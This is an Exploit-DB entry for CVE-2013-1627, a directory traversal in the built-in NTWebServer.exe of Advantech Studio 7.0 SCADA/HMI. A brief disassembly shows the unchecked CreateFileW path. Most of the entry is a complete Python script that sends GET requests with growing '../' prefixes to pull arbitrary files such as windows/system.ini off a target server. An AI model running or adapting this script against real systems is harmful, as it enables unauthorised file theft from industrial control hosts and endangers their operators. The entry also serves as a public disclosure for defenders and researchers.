Advantech Studio 7.0 - SCADA/HMI Directory Traversal

EDB-ID:

23132

CVE:

2013-1627

EDB Verified:

Author:

Nin3

Type:

webapps

Exploit:   /  

Platform:

Windows

Date:

2012-12-04

Vulnerable App: 
# Exploit Title: Advantech Studio v7.0 SCADA/HMI Directory Traversal 0-day
# Google Dork: N/A
# Date: 2012-12-03
# Exploit Author: Nin3
# Vendor Homepage: http://advantech.com.tw
# Version: 7.0 Build Number 0501.1111.0402.0000
# Tested on: Windows
# CVE : N/A

'''
Advantech Studio v7.0 SCADA/HMI has a built in web server NTWebServer.exe,
the web server is a standalone executable that is used along side every project'
to serve as a web based management system with the help of an activex.

The flaw occurs because of a lack of any check on the path of the file requested. in
function sub_401A90:

.text:00402A4A                 push    0               ; dwFlagsAndAttributes
.text:00402A4C                 push    3               ; dwCreationDisposition
.text:00402A4E                 push    3               ; dwShareMode
.text:00402A50                 push    80000000h       ; dwDesiredAccess
.text:00402A55                 mov     edx, [ebp+lpFileName]
.text:00402A58                 push    edx             ; lpFileName
.text:00402A59                 lea     ecx, [ebp+var_1C]
.text:00402A5C                 call    sub_401A90


sub_401A90 use CreateFileW function directly.

.text:00401A97                 push    0               ; hTemplateFile
.text:00401A99                 mov     eax, [ebp+dwFlagsAndAttributes]
.text:00401A9C                 push    eax             ; dwFlagsAndAttributes
.text:00401A9D                 mov     ecx, [ebp+dwCreationDisposition]
.text:00401AA0                 push    ecx             ; dwCreationDisposition
.text:00401AA1                 push    0               ; lpSecurityAttributes
.text:00401AA3                 mov     edx, [ebp+dwShareMode]
.text:00401AA6                 push    edx             ; dwShareMode
.text:00401AA7                 mov     eax, [ebp+dwDesiredAccess]
.text:00401AAA                 push    eax             ; dwDesiredAccess
.text:00401AAB                 mov     ecx, [ebp+lpFileName]
.text:00401AAE                 push    ecx             ; lpFileName
.text:00401AAF                 call    ds:CreateFileW

'''
import argparse
import httplib

MAX_NESTED_DIRECTORY = 32

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('-d')
    parser.add_argument('-p')
    parser.add_argument('-f')  
    args = parser.parse_args()
    if args.d == None or args.p == None or args.f == None:
        print "[!]EXAMPLE USAGE: traverse.py -d 127.0.0.1 -p 80 -f windows/system.ini"
        return
    httpConn = httplib.HTTPConnection(args.d, int(args.p))
    for i in xrange(0, MAX_NESTED_DIRECTORY):
        temp = MakePath(args.f, i)
        httpConn.request('GET', temp)
        resp = httpConn.getresponse()
        content =  resp.read()
        if resp.status == 404:
            print 'Not found ' + temp
        else:
            print 'Found ' + temp
            print'------------------------------------------'
            print content
            print'---------------------------------------EOF'
            break
        
    
    
def MakePath(f, count):
    a = ""
    for i in xrange(0, count):
        a = a + "../"
    return a + f

if __name__ == "__main__":
    main()
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services